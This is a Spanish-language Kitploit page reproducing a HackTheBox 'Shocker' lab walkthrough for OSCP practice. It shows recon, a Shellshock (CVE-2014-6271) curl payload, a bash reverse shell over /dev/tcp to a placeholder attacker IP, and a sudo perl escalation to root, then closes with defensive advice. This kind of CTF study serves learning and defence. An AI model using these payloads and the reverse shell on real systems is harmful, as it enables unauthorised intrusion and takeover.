Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Shocker-TJNULL-OSCP- — Walkthrough estructurado de HTB que demuestra la explotación de Shellshock (CVE-2014-6271) mediante fuzzing de directorios CGI y escalada de privilegios a través de permisos sudo de Perl mal configurados usando GTFOBins. | Kitploit
Herramientas/GitHubGitHub/r3fr4kt/shocker-tjnull-oscp-
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubr3fr4kt/shocker-tjnull-oscp-

Shocker-TJNULL-OSCP-

Walkthrough estructurado de HTB que demuestra la explotación de Shellshock (CVE-2014-6271) mediante fuzzing de directorios CGI y escalada de privilegios a través de permisos sudo de Perl mal configurados usando GTFOBins.

Ver Repositorio
1hace 3 mesesAún no revisado

HackTheBox: Writeup de Shocker

Un recorrido estructurado y profesional que muestra la identificación y explotación manual de la crítica vulnerabilidad Shellshock, seguida de una escalada de privilegios local mediante permisos sudo mal configurados en un objetivo Linux.


Resumen Técnico

  • Sistema operativo objetivo: Linux
  • Dirección IP: 10.10.10.56
  • Dificultad: Fácil
  • Vulnerabilidades principales: Shellshock (CVE-2014-6271) y privilegios Sudo mal configurados (/usr/bin/perl)
  • Objetivo: Obtener acceso inicial de usuario mediante inyección de variables de entorno CGI y escalar a root.

1. Enumeración y Reconocimiento

La evaluación comienza con un escaneo SYN TCP rápido de todos los puertos, dirigido solo a puertos abiertos (--open), omitiendo el descubrimiento de hosts (-Pn) y la resolución DNS (-n) para acelerar la recopilación de información.

root@kitploit:~
nmap -Pn -n -p- -sS --min-rate 5000 --open 10.10.10.56

Perfil de Servicios y Vulnerabilidades

El barrido inicial revela dos servicios activos. Realizamos un escaneo secundario dirigido para ejecutar detección agresiva de versiones (-sCV) y evaluación de vulnerabilidades basada en scripts:

root@kitploit:~
nmap -sCV -p80,2222 --script="safe and vuln" 10.10.10.56

Resultados del Escaneo

  • Puerto 80: HTTP (Servidor web Apache)
  • Puerto 2222: SSH (Puerto no estándar)

2. Fuzzing de Directorios y Enumeración Web

En paralelo con nuestros escaneos de vulnerabilidades, iniciamos la fuerza bruta de directorios web utilizando gobuster para mapear recursos ocultos en el servidor Apache. Empleamos un lista de palabras estándar del framework SecLists:

root@kitploit:~
gobuster dir -u [http://10.10.10.56/](http://10.10.10.56/) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 20

Hallazgo Crucial

El proceso de fuzzing identifica un directorio /cgi-bin/ no indexado. En implementaciones web antiguas, los servidores Apache utilizan la Interfaz de Entrada Común (CGI) para ejecutar scripts del lado del servidor. Dado el nombre de la máquina y la presencia de esta carpeta, buscamos agresivamente scripts ejecutables (por ejemplo, .sh, .cgi) que puedan ser susceptibles a fallos de inyección de variables de entorno.

Una enumeración más detallada revela un script llamado user.sh dentro del directorio /cgi-bin/.


3. Weaponización y Primer Acceso

Prueba de Shellshock (PoC)

La vulnerabilidad Shellshock (CVE-2014-6271) permite a los atacantes ejecutar comandos arbitrarios del sistema operativo mediante la inyección de definiciones maliciosas de funciones dentro de las cabeceras de las peticiones HTTP (como User-Agent) procesadas por instancias vulnerables de Bash.

Creamos un comando curl personalizado para enviar un payload de Prueba de Concepto (PoC) diseñado para forzar al sistema remoto a ejecutar el comando /usr/bin/id:

root@kitploit:~
curl -H "User-Agent: () { :; }; echo; /usr/bin/id" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
  • Resultado: El servidor web responde con la salida del comando id, validando Ejecución Remota de Código (RCE) sin autenticación de tipo autenticado.

Establecimiento de una Reverse Shell

Para mejorar nuestro vector de ejecución a una sesión interactiva, establecemos un listener local de Netcat en nuestra plataforma de ataque:

root@kitploit:~
nc -lvnp 4444

A continuación, inyectamos una cadena nativa de reverse shell de Bash dentro de la cabecera User-Agent maliciosa para forzar una conexión de retorno a través de TCP:

root@kitploit:~
curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/<YOUR_TUN0_IP>/4444 0>&1" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)

Tras la ejecución exitosa, recibimos una shell estable con bajos privilegios:

root@kitploit:~
$ whoami
shelly

4. Escalada de Privilegios Local (LPE)

Con un contexto de usuario funcional en el sistema, auditamos nuestras restricciones locales. Consultamos la configuración de sudo para determinar si el usuario shelly está autorizado a ejecutar comandos con permisos elevados sin proporcionar contraseña:

root@kitploit:~
sudo -l

Auditoría de Configuración Sudo

La salida revela la siguiente entrada de alto riesgo:

root@kitploit:~
User shelly may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl

Explotación de Perl mediante GTFOBins

Debido a que tenemos acceso irrestricto y sin autenticación para ejecutar el binario perl como root, podemos fácilmente escapar de las restricciones del binario. Consultando GTFOBins, encontramos un wrapper de ejecución que indica a Perl que abra una shell nativa del sistema (/bin/sh) manteniendo el contexto de identidad de ejecución (root):

root@kitploit:~
sudo -u root perl -e 'exec "/bin/sh"'

Inmediatamente obtenemos un contexto de ejecución completo de administrador:

root@kitploit:~
# whoami
root

5. Post-Explotación y Saqueo

Ahora que se ha establecido acceso root, navegamos a los directorios personales relevantes para recuperar las pruebas de compromiso.

root@kitploit:~
# Acceder a la bandera de usuario
cat /home/shelly/user.txt

# Acceder a la bandera de root
cat /root/root.txt

Conclusiones Clave y Recomendaciones Defensivas

  1. Parchear software inherentemente vulnerable: Shellshock es una vulnerabilidad heredada y catastrófica en GNU Bash. Asegúrese de que todos los componentes del servidor reciban parches de seguridad proactivos para utilidades fundamentales.
  2. Asegurar el entorno CGI: Si los scripts CGI deben mantenerse, asegúrese de que se ejecuten bajo modelos de ejecución aislados y en sandbox (por ejemplo, utilizando entornos de ejecución de contenedores especializados o entornos chroot) y evite el uso de shells predeterminadas obsoletas y vulnerables.
  3. Aplicar el principio de mínimo privilegio estricto: Otorgar a los usuarios estándar acceso sin restricciones para ejecutar intérpretes potentes integrados como perl, python o bash mediante sudo introduce vectores de escalada instantáneos. El acceso sudo debe limitarse a scripts administrativos no interactivos y altamente controlados.
root@kitploit:~
Descargar herramienta